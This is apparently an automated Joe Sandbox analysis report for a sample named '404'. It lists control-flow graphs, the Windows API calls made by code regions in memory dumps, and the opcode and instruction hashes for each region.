                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                            • String ID: 4'q
                                                                                                                                                                                                                                                            • API String ID: 2063062207-1807707664
                                                                                                                                                                                                                                                            • Opcode ID: 09dd791e25ae11c7ab23655a871bdda81ce2fea08c6bbc1062a046d8f127d8bf
                                                                                                                                                                                                                                                            • Instruction ID: b0d6578eae507344833bb38bc6ae6b3b29a607742f65fa871e3f5e85fe63fd40
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09dd791e25ae11c7ab23655a871bdda81ce2fea08c6bbc1062a046d8f127d8bf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B614AB0D00319DFEB15DFAAD548BAEBBF1EF48304F20816AD409AB360D7346945CB65

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 323 242d078-242d107 GetCurrentProcess 327 242d110-242d144 GetCurrentThread 323->327 328 242d109-242d10f 323->328 329 242d146-242d14c 327->329 330 242d14d-242d181 GetCurrentProcess 327->330 328->327 329->330 332 242d183-242d189 330->332 333 242d18a-242d1a5 call 242d248 330->333 332->333 336 242d1ab-242d1da GetCurrentThreadId 333->336 337 242d1e3-242d245 336->337 338 242d1dc-242d1e2 336->338 338->337
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0242D0F6
                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0242D133
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0242D170
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0242D1C9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                                            • Opcode ID: 9b4eb3998367c0b62e4dc028ced23dbf68bb809947c093dbc3f7235e67225324
                                                                                                                                                                                                                                                            • Instruction ID: f642c8bd16d49909ecd55e564ce033ad1c57a0880a871faea1a8f9cea18befba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b4eb3998367c0b62e4dc028ced23dbf68bb809947c093dbc3f7235e67225324
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 345135B0D00319CFEB15DFAAD548BAEBBF5EF48314F20806AE419A7360D734A944CB65

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 583 242adf0-242adff 584 242ae01-242ae0e call 24297f8 583->584 585 242ae2b-242ae2f 583->585 592 242ae10 584->592 593 242ae24 584->593 586 242ae43-242ae84 585->586 587 242ae31-242ae3b 585->587 594 242ae91-242ae9f 586->594 595 242ae86-242ae8e 586->595 587->586 638 242ae16 call 242b078 592->638 639 242ae16 call 242b088 592->639 593->585 597 242aec3-242aec5 594->597 598 242aea1-242aea6 594->598 595->594 596 242ae1c-242ae1e 596->593 599 242af60-242b020 596->599 602 242aec8-242aecf 597->602 600 242aeb1 598->600 601 242aea8-242aeaf call 242a7d4 598->601 633 242b022-242b025 599->633 634 242b028-242b053 GetModuleHandleW 599->634 605 242aeb3-242aec1 600->605 601->605 603 242aed1-242aed9 602->603 604 242aedc-242aee3 602->604 603->604 607 242aef0-242aef9 call 242a7e4 604->607 608 242aee5-242aeed 604->608 605->602 614 242af06-242af0b 607->614 615 242aefb-242af03 607->615 608->607 617 242af29-242af36 614->617 618 242af0d-242af14 614->618 615->614 623 242af38-242af56 617->623 624 242af59-242af5f 617->624 618->617 619 242af16-242af26 call 242a7f4 call 242a804 618->619 619->617 623->624 633->634 635 242b055-242b05b 634->635 636 242b05c-242b070 634->636 635->636 638->596 639->596
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0242B046
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                                            • Opcode ID: cb18c9a3b79e7c2ce44fc9b0c6f649e68dea62224fec07078693892025ee81c9
                                                                                                                                                                                                                                                            • Instruction ID: 6cf55f76e25e07d8dcb51aa16267a88528d5805f3fddf0da2ea9c993eceec8f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb18c9a3b79e7c2ce44fc9b0c6f649e68dea62224fec07078693892025ee81c9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17712570A00B258FD724DF2AD14475ABBF2FF88204F50892ED48AD7B50D775E94ACB94

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 640 9b9c5e0-9b9c63b 641 9b9c63d 640->641 642 9b9c642-9b9c65e 640->642 641->642 644 9b9c851-9b9c864 642->644 645 9b9c664-9b9c679 642->645 646 9b9c878-9b9c87e 644->646 647 9b9c688-9b9c6b4 GetCurrentThreadId 645->647 648 9b9c67b-9b9c67e call 9b9bf7c 645->648 654 9b9c87f 646->654 649 9b9c6bd-9b9c6d2 647->649 650 9b9c6b6-9b9c6bc 647->650 655 9b9c683 648->655 652 9b9c72d-9b9c766 649->652 653 9b9c6d4-9b9c6db 649->653 650->649 661 9b9c768-9b9c778 652->661 662 9b9c77b-9b9c782 652->662 659 9b9c6dd 653->659 660 9b9c6e5 653->660 654->654 656 9b9c849 655->656 656->644 659->660 687 9b9c6e8 call 9b9d8d1 660->687 688 9b9c6e8 call 9b9d8e0 660->688 661->662 663 9b9c78a-9b9c7b0 662->663 664 9b9c784 662->664 669 9b9c7b2 663->669 670 9b9c7b7-9b9c800 663->670 664->663 665 9b9c6ed-9b9c714 673 9b9c72a 665->673 674 9b9c716-9b9c71c 665->674 669->670 680 9b9c80a-9b9c83f 670->680 681 9b9c802 670->681 673->652 674->673 675 9b9c71e-9b9c725 call 9b9bf8c 674->675 675->673 684 9b9c808 680->684 685 9b9c841-9b9c848 680->685 681->680 684->680 686 9b9c873-9b9c877 684->686 685->656 686->646 687->665 688->665
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 09B9C6A0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                                                                                            • Opcode ID: c2e85585ee72f32304188368dcfdd959641ecca67cbb553c3f834464234b6464
                                                                                                                                                                                                                                                            • Instruction ID: 912a247a07dca0d2163f8cbd9caaf0e162c81b6260384729cdb0749d2e86a1e3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2e85585ee72f32304188368dcfdd959641ecca67cbb553c3f834464234b6464
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E614674D21209DFDB14DFA9D484BADBFB1FF48320F1080A9E449AB291CB389885CF50

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 689 24258ed-242596c 691 242596f-24259b9 CreateActCtxA 689->691 693 24259c2-2425a1c 691->693 694 24259bb-24259c1 691->694 701 2425a2b-2425a2f 693->701 702 2425a1e-2425a21 693->702 694->693 703 2425a40-2425a70 701->703 704 2425a31-2425a3d 701->704 702->701 708 2425a22-2425a27 703->708 709 2425a72-2425af4 703->709 704->703 708->701
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 024259A9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                                            • Opcode ID: 98d3ddff70fa970e2c47de732a226cab6067a327c4a4040bca316443c4b66b57
                                                                                                                                                                                                                                                            • Instruction ID: 3811473087a2403d1d99ea468515a2c1ec0f88b0007ae680f15d6b2bb676f674
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98d3ddff70fa970e2c47de732a226cab6067a327c4a4040bca316443c4b66b57
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0941D471D00729CFEB24DFA5C8847DDBBB5BF48304F60806AD408AB251D775694ACF50

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 712 242449c-24259b9 CreateActCtxA 716 24259c2-2425a1c 712->716 717 24259bb-24259c1 712->717 724 2425a2b-2425a2f 716->724 725 2425a1e-2425a21 716->725 717->716 726 2425a40-2425a70 724->726 727 2425a31-2425a3d 724->727 725->724 731 2425a22-2425a27 726->731 732 2425a72-2425af4 726->732 727->726 731->724
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 024259A9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                                            • Opcode ID: 770b9f5066fef622e9655eaa0b216d1c1054675c41717da1d3546785b38d6983
                                                                                                                                                                                                                                                            • Instruction ID: 74ea998192762789dd4890a51d3714fab066e82c53b085e6d06c0a8633e3465b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 770b9f5066fef622e9655eaa0b216d1c1054675c41717da1d3546785b38d6983
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8341B471D00719CBEB28DFAAC84479EBBF5BF48304F60816AD408AB251DB756949CF50

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 735 2425a64-2425a70 736 2425a22-2425a27 735->736 737 2425a72-2425af4 735->737 740 2425a2b-2425a2f 736->740 741 2425a40-2425a41 740->741 742 2425a31-2425a3d 740->742 741->735 742->741
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 2b974c990ead0dba00f8014beb611c16575b9079a68c195b93835d0922c3f2c8
                                                                                                                                                                                                                                                            • Instruction ID: 7e3f65b345a9e511e9c035815dc46c899b318b81ea940953bb676ff6b62f5550
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b974c990ead0dba00f8014beb611c16575b9079a68c195b93835d0922c3f2c8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E031B871C043688FEB15CFA9C8857EEBBF0FF46304F90415AD405AB291D779A94ACB01

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 745 83e6a61-83e6adb 746 83e6add-83e6ae0 745->746 747 83e6ae3-83e6aec 745->747 746->747 748 83e6aee 747->748 749 83e6af1-83e6b21 GetClassInfoW 747->749 748->749 750 83e6b2a-83e6b4b 749->750 751 83e6b23-83e6b29 749->751 751->750
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 083E6B14
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                                                                            • Opcode ID: 2cfa51cceddfa1d1977219a76d33a4cb40764b536d9c3f7c900684f93821ef67
                                                                                                                                                                                                                                                            • Instruction ID: 3c9e905f4a63cfb3d323974b4d175e43b23710f99fc51ba02f17d1ed9154719a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cfa51cceddfa1d1977219a76d33a4cb40764b536d9c3f7c900684f93821ef67
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E31F4B5D093959FDB15CFAAC844ACEBFB4FF59210F1480AEE444A7242D334A905CB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,0528D49E,?,?,?,00000E20,?,?,09B9DAA0,035E4118,0262C1DC), ref: 09B9DB31
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                                                                                                                                            • Opcode ID: 97b207e0f6c5188dac58077712c819290b39406d8698c1a6a4e65ca4833c0730
                                                                                                                                                                                                                                                            • Instruction ID: d030787f8c1193795cb7cfefaf64fff1d5549b85966c06f89128bfe1f9303b28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97b207e0f6c5188dac58077712c819290b39406d8698c1a6a4e65ca4833c0730
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 182175719142098FDB10CFAAC884BEEFBF4EB88320F10856AE454A7290C774A905CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 09B9DA52
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                                                                                            • Opcode ID: 008580315ed77701b3c03c79629d6e47e5ec15d93d5b2ccca61514abe2ff13d0
                                                                                                                                                                                                                                                            • Instruction ID: 55f8223d0fad7982c95b4204644cf0c9ecb23c8725dce6f70e68a8116f571544
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 008580315ed77701b3c03c79629d6e47e5ec15d93d5b2ccca61514abe2ff13d0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 583145B49043498FDB10DFAAD444A8EFFF1EB48314F14856AD418AB362D375A945CFA1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0242D347
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 9f10eca266c8976e8c1f323307664026bfdfc4029a4e2b86fe7c56bba85fd490
                                                                                                                                                                                                                                                            • Instruction ID: 552b44f6728921eae5bcf1b23b92d823361c31d999b01c6859d414be23318279
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f10eca266c8976e8c1f323307664026bfdfc4029a4e2b86fe7c56bba85fd490
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B221E0B6D00219DFDB10CFAAD984ADEBBF5FB48314F14801AE918A7351C378A945CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 09B9DA52
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                                                                                            • Opcode ID: ce8434985030cb6dae55aeb0dd02525960245cac872fcc19415f0dc79781b469
                                                                                                                                                                                                                                                            • Instruction ID: 13e4a4c83519ca8e35a24701d70b77541e94395d992f6e9158373df7c316f8c9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8434985030cb6dae55aeb0dd02525960245cac872fcc19415f0dc79781b469
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B2162B49003498FDB10DFAAD880A9EFBF1FB48324F10856AE418AB311C374A945CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 083E96DD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                                            • Opcode ID: a93ed9e6547c54c861333c110aa5ff211757b6b217843d00336c32333c762f1a
                                                                                                                                                                                                                                                            • Instruction ID: 7e3f2765177bf418e5de0e191582c8511c8a5514688b39bc5ad0d38a32234ad2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a93ed9e6547c54c861333c110aa5ff211757b6b217843d00336c32333c762f1a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54216AB280434A8FDB10CF99C885BDEBFF4FB49310F10805AD454A7652D378A945CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,0528D49E,?,?,?,00000E20,?,?,09B9DAA0,035E4118,0262C1DC), ref: 09B9DB31
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                                                                                                                                            • Opcode ID: 6edb245d22ddde9fe5a584e28a2def3ce0ca9eaf981abb66036c8d126323aa36
                                                                                                                                                                                                                                                            • Instruction ID: bbdb0607f6879c9c9841c1167c42b063cc6d0da7350e9f6d014cc4a990e56f22
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6edb245d22ddde9fe5a584e28a2def3ce0ca9eaf981abb66036c8d126323aa36
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2213871D102098FDB14CF9AC844BEEFBF5EB88320F14846AE815A7390D774A940CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0242D347
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: fda69c832d7ca8b1b4354a84b4c2f603ae47115b582f3b7673ef964bf72fa901
                                                                                                                                                                                                                                                            • Instruction ID: 64d7cdc8c08137598c40a049dd371928ffc67c093f82d311c1daa233e4669c48
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fda69c832d7ca8b1b4354a84b4c2f603ae47115b582f3b7673ef964bf72fa901
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F921E4B5D00218DFDB10CFAAD984ADEBBF4FB48310F14801AE914A3350C378A944CF65
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,0528D49E,?,?,?,00000E20,?,?,09B9DAA0,035E4118,0262C1DC), ref: 09B9DB31
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                                                                                                                                            • Opcode ID: fac5a5e78b5ba4a9d8bb7bcc7631f6317de0f3c73d1a00ca30a32b9e5e623a93
                                                                                                                                                                                                                                                            • Instruction ID: 36c4109e461fb22c8e0b6c5de13f07a4b68a8dd5df2bba4a6bf9308a152629a5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fac5a5e78b5ba4a9d8bb7bcc7631f6317de0f3c73d1a00ca30a32b9e5e623a93
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 522125B19102198FDB14CF9AC844BEEFBF5EF88320F14842AE414A7290D774A941CFA1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 083E6B14
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                                                                            • Opcode ID: 7bf4b438a7a5ad5645dcbdfc2f9052d5c5d99d6cd04b95c0853a9b3bd9643a9a
                                                                                                                                                                                                                                                            • Instruction ID: 6b141db60473babb4b626cba31dff827074fe6400665ed20b9e228856935079f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bf4b438a7a5ad5645dcbdfc2f9052d5c5d99d6cd04b95c0853a9b3bd9643a9a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 402104B6D013199FDB14CF9AC885ADEFBF8FB98310F14802EE419A3240E374A944CB65
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 09B90670
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                                                                            • Opcode ID: 790553cf05711752e865b9465f3f8d1a803c78bc8b9c8a90583dd8c655182e89
                                                                                                                                                                                                                                                            • Instruction ID: 6ae28f37d4bfa4cf5fe4040969cb9d47b44505a1dc7349526e2d2911f8bb5887
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 790553cf05711752e865b9465f3f8d1a803c78bc8b9c8a90583dd8c655182e89
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D2138B6C143499FDB10CF9AD840BDEBBF4EB48320F10806AE958A7251C3789945CF65
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 09B9093D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                            • Opcode ID: 6d6dc3ff6cbdf15767f84dd45eb28981b2fb5db7b0d5a4220899401fc1acca69
                                                                                                                                                                                                                                                            • Instruction ID: bfcda11722cc133efd679373bebb38d359ed09620cd2d28c2b15ddabd5362c68
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6dc3ff6cbdf15767f84dd45eb28981b2fb5db7b0d5a4220899401fc1acca69
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C2144B2C143498FDB10DF9AD884BDEFBF4EB08320F00806AE458A3251C378A944CFA5
                                                                                                                                                                                                                                                            APIs
